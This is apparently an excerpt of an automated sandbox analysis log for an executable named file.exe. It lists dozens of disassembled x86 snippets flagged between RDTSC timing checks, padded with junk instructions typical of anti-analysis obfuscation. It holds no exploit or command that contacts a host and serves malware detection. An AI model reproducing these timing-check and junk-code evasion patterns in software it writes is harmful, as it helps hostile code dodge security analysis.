Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B4F second address: 4FA003B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007FA93D08FB63h 0x0000001b xor eax, eax 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007FA941F4DFABh 0x00000031 mov edi, edi 0x00000033 jmp 00007FA93D08FA26h 0x00000038 xchg eax, ebp 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop esi 0x0000003c push ebx 0x0000003d call 00007FA93D08FA24h 0x00000042 pop eax 0x00000043 pop edx 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA003B second address: 4FA0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0055 second address: 4FA007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 push eax 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA93D08FA24h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA007D second address: 4FA0081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0081 second address: 4FA0087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0087 second address: 4FA00C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, ebx 0x00000010 call 00007FA93CFE6D69h 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA00C1 second address: 4FA00D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA00D2 second address: 4FA00EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FA93CFE6D59h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edx, esi 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA00EC second address: 4FA0110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 12B24219h 0x00000008 mov eax, 4D9BE6D5h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FA93D08FA1Ch 0x00000019 movzx esi, bx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0110 second address: 4FA0135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA93CFE6D5Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0135 second address: 4FA013B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA013B second address: 4FA0184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c mov edi, 0D0164E4h 0x00000011 pushfd 0x00000012 jmp 00007FA93CFE6D5Dh 0x00000017 adc eax, 7BE8C526h 0x0000001d jmp 00007FA93CFE6D61h 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0184 second address: 4FA0188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0188 second address: 4FA018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA02A5 second address: 4FA02AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA02AA second address: 4FA02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov dx, D986h 0x0000000d mov di, 0812h 0x00000011 popad 0x00000012 sub esp, 18h 0x00000015 pushad 0x00000016 mov bx, 876Ah 0x0000001a call 00007FA93CFE6D5Bh 0x0000001f pop ebx 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA02D8 second address: 4FA02DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA02DE second address: 4FA036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA93CFE6D64h 0x00000009 jmp 00007FA93CFE6D65h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FA93CFE6D68h 0x0000001e sbb eax, 73388418h 0x00000024 jmp 00007FA93CFE6D5Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FA93CFE6D68h 0x00000030 add esi, 2247EE78h 0x00000036 jmp 00007FA93CFE6D5Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA036C second address: 4FA0372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0372 second address: 4FA0376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0376 second address: 4FA03A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a movsx edi, cx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 jmp 00007FA93D08FA1Eh 0x00000018 push eax 0x00000019 pushad 0x0000001a mov al, dl 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx edi, ax 0x00000026 mov ebx, eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA03A8 second address: 4FA03D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA93CFE6D60h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA93CFE6D67h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA03D8 second address: 4FA03DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA03DE second address: 4FA03F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA93CFE6D5Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA03F6 second address: 4FA0465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA93D08FA1Fh 0x00000012 or ecx, 42B5D86Eh 0x00000018 jmp 00007FA93D08FA29h 0x0000001d popfd 0x0000001e mov bl, ah 0x00000020 popad 0x00000021 mov eax, dword ptr [769B4538h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FA93D08FA29h 0x0000002d jmp 00007FA93D08FA1Bh 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 mov cl, 4Fh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0465 second address: 4FA04B3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA93CFE6D5Bh 0x00000008 or esi, 2CA233DEh 0x0000000e jmp 00007FA93CFE6D69h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xor dword ptr [ebp-08h], eax 0x0000001a pushad 0x0000001b mov edi, ecx 0x0000001d mov cx, 339Fh 0x00000021 popad 0x00000022 xor eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA93CFE6D5Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA04B3 second address: 4FA04C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA04C5 second address: 4FA04EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA93CFE6D65h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA04EE second address: 4FA055B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1C033862h 0x00000008 pushfd 0x00000009 jmp 00007FA93D08FA23h 0x0000000e adc cx, 695Eh 0x00000013 jmp 00007FA93D08FA29h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007FA93D08FA21h 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA93D08FA28h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA055B second address: 4FA0561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0561 second address: 4FA05B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA93D08FA1Ch 0x00000008 pop eax 0x00000009 jmp 00007FA93D08FA1Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 pushad 0x00000015 mov dx, ax 0x00000018 pushfd 0x00000019 jmp 00007FA93D08FA20h 0x0000001e and ecx, 719FC948h 0x00000024 jmp 00007FA93D08FA1Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr fs:[00000000h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA05B6 second address: 4FA05BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA05BA second address: 4FA05C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA05C0 second address: 4FA05C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA05C6 second address: 4FA05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA05CA second address: 4FA05CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA05CE second address: 4FA0634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b pushad 0x0000000c mov si, 1DFDh 0x00000010 pushfd 0x00000011 jmp 00007FA93D08FA1Ah 0x00000016 and ah, FFFFFFD8h 0x00000019 jmp 00007FA93D08FA1Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000018h] 0x00000026 jmp 00007FA93D08FA26h 0x0000002b mov ecx, dword ptr [eax+00000FDCh] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA93D08FA27h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0634 second address: 4FA06AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA93CFE6D5Fh 0x00000009 add ecx, 582923AEh 0x0000000f jmp 00007FA93CFE6D69h 0x00000014 popfd 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test ecx, ecx 0x0000001c jmp 00007FA93CFE6D5Ah 0x00000021 jns 00007FA93CFE6D78h 0x00000027 jmp 00007FA93CFE6D60h 0x0000002c add eax, ecx 0x0000002e jmp 00007FA93CFE6D60h 0x00000033 mov ecx, dword ptr [ebp+08h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov bl, DFh 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA06AA second address: 4FA06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA06AF second address: 4FA06C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93CFE6D60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA06C3 second address: 4FA06C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F901BF second address: 4F90210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA93CFE6D5Fh 0x00000013 xor ax, CBCEh 0x00000018 jmp 00007FA93CFE6D69h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90210 second address: 4F90216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90216 second address: 4F9021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9021A second address: 4F9021E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9021E second address: 4F9025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA93CFE6D66h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 movsx edi, ax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA93CFE6D61h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9025B second address: 4F90261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90261 second address: 4F90265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90265 second address: 4F90276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90276 second address: 4F90289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93CFE6D5Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90289 second address: 4F9028D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9028D second address: 4F902D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FA93CFE6D62h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA93CFE6D5Dh 0x0000001a sbb si, 5586h 0x0000001f jmp 00007FA93CFE6D61h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F902D4 second address: 4F902D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F902D9 second address: 4F902F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA93CFE6D5Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F902F2 second address: 4F902F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90354 second address: 4F9036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9036C second address: 4F90371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90371 second address: 4F90377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90377 second address: 4F9037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9037B second address: 4F903C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d jmp 00007FA93CFE6D67h 0x00000012 inc ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA93CFE6D65h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F903C7 second address: 4F9041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA93D08FA27h 0x00000009 xor al, FFFFFFAEh 0x0000000c jmp 00007FA93D08FA29h 0x00000011 popfd 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test al, al 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FA93D08FA22h 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9041C second address: 4F90484 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FA93CFE6F86h 0x0000000d jmp 00007FA93CFE6D5Dh 0x00000012 lea ecx, dword ptr [ebp-14h] 0x00000015 jmp 00007FA93CFE6D5Eh 0x0000001a mov dword ptr [ebp-14h], edi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FA93CFE6D5Eh 0x00000024 and esi, 6C78FFE8h 0x0000002a jmp 00007FA93CFE6D5Bh 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FA93CFE6D66h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90502 second address: 4F90589 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA93D08FA20h 0x00000008 sbb si, FC98h 0x0000000d jmp 00007FA93D08FA1Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007FA93D08FA28h 0x0000001a popad 0x0000001b test eax, eax 0x0000001d pushad 0x0000001e mov cl, 20h 0x00000020 pushfd 0x00000021 jmp 00007FA93D08FA23h 0x00000026 jmp 00007FA93D08FA23h 0x0000002b popfd 0x0000002c popad 0x0000002d jg 00007FA9AEA5D933h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA93D08FA20h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90589 second address: 4F90598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90598 second address: 4F90674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FA93D08FAB4h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA93D08FA1Ch 0x00000016 and esi, 4477E548h 0x0000001c jmp 00007FA93D08FA1Bh 0x00000021 popfd 0x00000022 mov edi, ecx 0x00000024 popad 0x00000025 cmp dword ptr [ebp-14h], edi 0x00000028 pushad 0x00000029 mov cx, 8CB7h 0x0000002d call 00007FA93D08FA1Ch 0x00000032 jmp 00007FA93D08FA22h 0x00000037 pop esi 0x00000038 popad 0x00000039 jne 00007FA9AEA5D8ABh 0x0000003f pushad 0x00000040 call 00007FA93D08FA27h 0x00000045 pushfd 0x00000046 jmp 00007FA93D08FA28h 0x0000004b jmp 00007FA93D08FA25h 0x00000050 popfd 0x00000051 pop esi 0x00000052 mov di, 0D44h 0x00000056 popad 0x00000057 mov ebx, dword ptr [ebp+08h] 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FA93D08FA26h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90674 second address: 4F90686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93CFE6D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90686 second address: 4F906BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b pushad 0x0000000c mov bl, 5Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FA93D08FA24h 0x00000016 adc si, C388h 0x0000001b jmp 00007FA93D08FA1Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F906BC second address: 4F906FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b jmp 00007FA93CFE6D60h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA93CFE6D5Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F906FB second address: 4F9070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9070D second address: 4F90725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90725 second address: 4F90740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
